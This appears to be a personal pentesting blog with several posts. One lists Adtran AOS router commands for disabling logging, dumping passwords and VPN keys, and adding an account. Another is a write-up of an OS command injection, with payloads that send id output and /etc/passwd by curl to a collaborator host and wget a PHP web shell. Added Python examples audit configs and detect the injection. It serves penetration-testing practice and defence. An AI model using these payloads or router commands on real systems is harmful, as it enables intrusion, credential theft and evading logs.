Friday, October 7, 2022

Useful AOS (Adtran OS) CLI commands and tips for pentesting

Below is some junk for AOS you might find useful in a pentest.


CLI cmds:

Turns on privileged commands (all commands below assume enable executed successfully):

enable

Disable event logging for this session:

no events all

From here, for easy hacking, if the system is in a DMZ, hanging off the internet, or the proper ports are exposed, just enable the http server and continue from there.

configure terminal
http server 80

If you can't access the http server, the cmds below should help get some info out of the system.

Lists users and PWs (displays usernames and passwords):

show running-config | include username

Add new user with op privs:

configure terminal

username operator privilege 10 password unencrypted passwd1

List IPs:

show ip interfaces

Download a file to the target system (after running the cmd below you will be prompted for more data, and you will need a tftp server running that is accessible by the target):

copy tftp flash (or copy tftp cflash)

Download a file from the target to your system:

copy flash tftp

View VPN names and preshared keys:

show crypto ike remote-id

View VPN configs (the cmd below should give all client configs; add the name at the end to view only that name's config):

show crypto ike configuration pool

View VPN policy:

show crypto ike policy
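The two things above that give a pentester the quickest win (plaintext passwords visible via `show running-config | include username`, and a cleartext `http server`) are also the easiest to audit for on your own devices. Added example, not from the original post or from Adtran: a small Python checker run over a constructed running-config excerpt. The username and http server syntax follows the commands quoted above; the quoting and the `password encrypted` form are assumptions.

```python
import re

# Constructed excerpt in the style of an AOS running-config (not a real device
# dump). The username and http server lines follow the command syntax quoted in
# the post; the quoting and the "encrypted" form are assumptions.
SAMPLE_CONFIG = """\
!
hostname "branch-rtr"
!
username "admin" privilege 15 password encrypted "1a2b3c4d5e"
username "operator" privilege 10 password unencrypted "passwd1"
!
http server 80
!
"""

USERNAME_RE = re.compile(
    r'^username\s+"?(?P<user>[^"\s]+)"?'
    r'(?:\s+privilege\s+(?P<priv>\d+))?'
    r'\s+password\s+(?P<mode>encrypted|unencrypted)\s+"?(?P<secret>[^"\s]+)"?$'
)
HTTP_RE = re.compile(r'^http(?P<tls>s)?\s+server(?:\s+(?P<port>\d+))?')


def audit_aos_config(text):
    """Return (line, severity, message) findings; secrets are never echoed."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = USERNAME_RE.match(line)
        if m and m["mode"] == "unencrypted":
            findings.append((lineno, "HIGH",
                f'user "{m["user"]}" (privilege {m["priv"] or "default"}) has a '
                'plaintext password: "show running-config | include username" '
                'hands it to anyone with exec access'))
        m = HTTP_RE.match(line)
        if m and not m["tls"]:
            findings.append((lineno, "MEDIUM",
                f'cleartext http server on port {m["port"] or 80}: web '
                'management and its logins cross the network unencrypted'))
    return findings


if __name__ == "__main__":
    for lineno, sev, msg in audit_aos_config(SAMPLE_CONFIG):
        print(f"line {lineno} [{sev}] {msg}")
```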

TCL script to set up a VPN in the AOS CLI with walk-through:

https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf

AOS CLI reference:

https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf

If you have anything to add please hit me up and let me know, I would love to see this grow!

Monday, August 29, 2022

Hax11 updated!

Hax11 has been updated to work on the latest Kali, and it's still a target-rich environment out there folks! Get it HERE and get to hax0rin :)

Friday, July 8, 2022

VBox OpenVAS Appliance


Recently I have been trying to get OpenVAS running on anything other than my laptop: tried a Raspberry Pi, Docker, then a bare-metal install of Ubuntu. No joy at all, ever. So I gave up and finally got it running on a Kali install using VirtualBox on my laptop. Did some work on the OpenVAS config to get you running faster, exported it, and got the VBox image running on my server to confirm. After all the pain and time lost installing and setting up, I figured I would export it as an appliance and share it with the net. You can get it here


Some notes:

  • ssh is running on 22022, login is user:asd123 (change that pw ASAP)
  • You have to ssh in as user to start OVAS: "sudo gvm-start"
  • Also change the root pw, as it is asd123 as well
  • GVM web UI is on port 5050
    • admin:asd123 (change that pw ASAP)
  • VBox is set to forward the ports, so whatever system you install it on is the IP you need to connect to, with the ports set to 22022 for ssh and 5050 for OVAS
  • Might also be a good idea to ssh in and update the feeds.
  • tops IP list is top 1000 TCP and top 100 UDP
  • Full and fast Clone 1 is Full and fast w/o DoS and a few other checks
  • Profit??
Enjoy :)

Sunday, March 6, 2022

GRGSM hacked/back ported/added legacy support/or something for the HackRF

This is a modified version of grgsm_livemon to make it work with the HackRF; for some reason they took it out of recent distributions, including RF-focused Linux distros like DragonOS. That was foolish, so I thought I would bring back the joy. Open in GNU Radio Companion, build, and play.

Example usage after building: python grgsm_livemon.py -a -g 30 -f [freq]M


Get it HERE

Friday, February 4, 2022

Yahoo! blunder to Facebook account recovery joy


A friend of my wife's and mine came to us wanting to know how she could get into an old Facebook account whose password she had forgotten. She created it back when FB was first introduced to the public, and it had messages and pics from a family member that had passed, so we wanted to help her if we could.

She told us she had already attempted to contact FB with no success, so I suggested she send a password reset request to whatever email account she used to set up the FB account, but she claimed that account no longer existed on Y! and she didn't have a phone tied to the account, which made the other recovery options unusable. I wasn't entirely sure this was even possible.

I know that after a while an account may become inactive and you need to re-activate it, but complete removal seemed uncommon. However, I also know that Y! has had its issues with security, and I remember they started deleting really old inactive accounts to cut down on hacked accounts. Luckily our friend did remember the email address she used, and we just recreated it in Y!. She sent the pw reset email and was able to get in. An interesting use case.

Thanks, 

Friday, January 7, 2022

Hacking around with os injection


During a recent pentest of an app made with PHP, Burp gave me a little surprise of an OS command injection notification! I had fun playing around with it, and it was in the oddest place. Burp had interaction with Collaborator, so it was a solid notification.

The issue was found in one of the app's upload functions, in a var called KeyId, which I think was passed to the PHP system call (or exec, passthru, etc.) for some reason. Here is the payload Burp was using to get Collaborator interaction:

14316'"`0&nslookup -q=cname fo70trk51oioge2t1p2zzdvvdmjp7fvcj46wul.burpcollaborator.net.&`' 

So for RCE I needed to use a str like: 

14316'"`0&< CMD >&`' 

First I wanted to verify I had access to the system, so I thought I would use curl to exfil the results of running a cmd, and my first choice was id to check my privs on the system. So I used this str:

14316'"`0&id|curl -d @- http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`' 

This confirmed I could run system cmds, exfil the data, and that I was running them as a low-level user. Then I started to exfil files to look for priv esc and gather info. I also used curl for this, making POST requests to Burp Collaborator and putting file data in the POST data. Here is an example str:

14316'"`0&curl -F file=@/etc/passwd http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`'

After getting a few files pulled down, I figured the next move was to try to get a web shell on the system to continue checking for priv esc. I would have preferred Metasploit, but due to the many network restrictions it wasn't an option, so I figured I would try to get the system to pull down a PHP web shell from the web, which worked like a charm. Here is the str I used to dl files from the web:

 14316'"`0&wget https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/9377612eee a89aed2b226a870e76ac12965d6694/easy-simple-php-webshell.php&`' 

Because the web shell is a GitHub project, I changed the name of the shell right away in case of automated scanners looking for easy wins. So that is it, have fun and stay safe out there.
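Every payload above works the same way: the KeyId value carries quote and backtick breakouts plus `&` or `|` to chain a second command. Added example, not from the original post or the tested app: the allowlist check the upload handler should have applied to KeyId, and a detector that runs the same check over access-log lines and reports which shell metacharacters were present. The log format, hostnames and addresses are constructed; the assumption that a legitimate KeyId is purely numeric comes from the only benign value shown in the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allowlist for KeyId. The post does not say what a legitimate value looks like;
# the only one shown is numeric, so digits-only is the assumption used here.
KEY_ID_RE = re.compile(r"^[0-9]{1,12}$")
# Shell metacharacters the post's payloads rely on: backtick and $( substitution,
# quote breakout, and & | ; command chaining.
META_RE = re.compile(r"[`'\"&|;]|\$\(")

# Combined-format access log line. The sample below is constructed; hostnames
# and addresses are placeholders, not the collaborator hosts from the post.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jan/2022:10:01:02 +0000] "POST /upload?KeyId=14316 HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Jan/2022:10:02:11 +0000] "POST /upload?KeyId=14316%27%22%600%26'
    'nslookup%20-q%3Dcname%20probe.example.net.%26%60%27 HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Jan/2022:10:03:40 +0000] "POST /upload?KeyId=14316%27%22%600%26'
    'id%7Ccurl%20-d%20%40-%20http%3A%2F%2Fprobe.example.net%2F%26%60%27 HTTP/1.1" 200 512',
]


def is_safe_key_id(value):
    """Allowlist check: the input validation the upload handler should do."""
    return KEY_ID_RE.fullmatch(value) is not None


def find_injection_attempts(log_lines):
    """Return (src, ts, key_id, metachars) for requests whose KeyId fails the allowlist."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qs decodes %xx after splitting, so an encoded %26 stays inside
        # the value instead of being treated as a parameter separator.
        for value in parse_qs(query, keep_blank_values=True).get("KeyId", []):
            if not is_safe_key_id(value):
                metas = sorted(set(META_RE.findall(value)))
                hits.append((m["src"], m["ts"], value, metas))
    return hits
```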